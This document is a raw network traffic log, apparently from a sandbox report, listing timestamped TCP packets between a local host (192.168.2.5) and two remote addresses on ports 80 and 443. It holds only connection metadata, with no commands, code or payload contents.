Oct 8, 2024 20:47:32.628344059 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.628602028 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.628621101 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.628632069 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.628643990 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.628659964 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.628671885 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.628700018 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.641289949 CEST	443	49829	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.641443014 CEST	443	49829	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.641570091 CEST	49829	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.641701937 CEST	49829	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.641725063 CEST	443	49829	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.641740084 CEST	49829	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.641747952 CEST	443	49829	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.642478943 CEST	443	49830	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.642565966 CEST	443	49830	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.642683029 CEST	443	49830	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.642743111 CEST	49830	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.642776966 CEST	49830	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.642786026 CEST	443	49830	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.642798901 CEST	49830	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.642802954 CEST	443	49830	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.644906998 CEST	49833	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.644929886 CEST	443	49833	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.644953966 CEST	49834	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.644963026 CEST	443	49834	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.644994020 CEST	49833	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.645019054 CEST	49834	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.645200968 CEST	49834	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.645200968 CEST	49833	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.645207882 CEST	443	49834	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.645215034 CEST	443	49833	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.648483038 CEST	443	49831	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.648660898 CEST	443	49831	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.648715973 CEST	49831	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.648763895 CEST	49831	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.648781061 CEST	443	49831	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.648791075 CEST	49831	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.648796082 CEST	443	49831	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.650743961 CEST	49835	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.650818110 CEST	443	49835	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.650947094 CEST	49835	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.651066065 CEST	49835	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.651084900 CEST	443	49835	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.711662054 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.711705923 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.711716890 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.711740971 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.711756945 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.711786985 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.711833000 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.711864948 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.711879015 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.711899042 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.711910963 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.711931944 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.711966038 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.711977005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.712006092 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.712160110 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.712193966 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.712217093 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.712234974 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.712235928 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.712270021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.712280989 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.712302923 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.712321043 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.712342024 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.712353945 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.712392092 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.712460995 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.712491035 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.712537050 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.712543964 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.712578058 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.712610006 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.712611914 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.712616920 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.712641954 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.712657928 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.712678909 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.712691069 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.712755919 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.712888002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.712919950 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.712949991 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.712951899 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.712961912 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.712980032 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.712996006 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.713013887 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.713023901 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.713047981 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.713080883 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.713093996 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.713115931 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.713124990 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.713148117 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.713166952 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.713196039 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.713202953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.713234901 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.713243961 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.713268995 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.713280916 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.713303089 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.713313103 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.713335991 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.713371992 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.713371992 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.713385105 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.713418961 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.713432074 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.713453054 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.713466883 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.713485003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.713494062 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.713520050 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.713532925 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.713553905 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.713563919 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.713586092 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.713596106 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.713619947 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.713632107 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.713655949 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.713670015 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.713690042 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.713700056 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.713723898 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.713735104 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.713757038 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.713788033 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.713788986 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.713788986 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.713821888 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.713855982 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.713861942 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.713869095 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.713890076 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.713910103 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.713923931 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.713942051 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.713957071 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.713970900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.713989973 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.714023113 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.714032888 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.714040041 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.714057922 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.714080095 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.714092016 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.714106083 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.714128971 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.714162111 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.714176893 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.714210987 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.714332104 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.714384079 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.714411974 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.714417934 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.714425087 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.714451075 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.714462996 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.714483976 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.714494944 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.714518070 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.714526892 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.714550972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.714562893 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.714582920 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.714595079 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.714617014 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.714628935 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.714648962 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.714659929 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.714682102 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.714689970 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.714714050 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.714720964 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.714747906 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.714780092 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.714798927 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.714813948 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.714833021 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.714847088 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.714865923 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.714880943 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.714895010 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.714932919 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.714951038 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.714982033 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715002060 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.715014935 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715028048 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.715048075 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715066910 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.715080976 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715092897 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.715114117 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715121984 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.715147018 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715157032 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.715179920 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715187073 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.715234995 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715271950 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715285063 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.715307951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715341091 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715343952 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.715362072 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.715373039 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715409040 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.715416908 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.715423107 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715455055 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715475082 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.715487003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715502977 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.715519905 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715543985 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.715553999 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715570927 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.715588093 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715607882 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.715620041 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715651989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715663910 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.715684891 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715718985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715733051 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.715765953 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.715832949 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715858936 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715873957 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715889931 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715898037 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.715902090 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715913057 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715922117 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.715924025 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715934992 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715945005 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715945005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.715954065 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715965033 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715967894 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.715974092 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715981007 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.715984106 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.715995073 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.716002941 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.716006041 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.716013908 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.716017008 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.716027021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.716037989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.716039896 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.716064930 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.716080904 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.798567057 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.798576117 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.798582077 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.798623085 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.798629045 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.798634052 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.798643112 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.798655987 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.798666954 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.798671961 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.798695087 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.798710108 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.799141884 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.799197912 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.799201965 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.799237013 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.799289942 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.799300909 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.799331903 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.799343109 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.799364090 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.799380064 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.799415112 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.799417973 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.799464941 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.799531937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.799563885 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.799587965 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.799597025 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.799608946 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.799629927 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.799645901 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.799663067 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.799670935 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.799698114 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.799715996 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.799735069 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.799748898 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.799777985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.799783945 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.799810886 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.799829006 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.799844980 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.799856901 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.799892902 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.800061941 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.800095081 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.800116062 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.800127983 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.800139904 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.800157070 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.800169945 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.800189972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.800204992 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.800224066 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.800239086 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.800256968 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.800271988 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.800291061 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.800309896 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.800331116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.800348997 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.800364017 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.800383091 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.800396919 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.800415993 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.800431013 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.800450087 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.800466061 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.800479889 CEST	49755	80	192.168.2.5	95.164.90.97
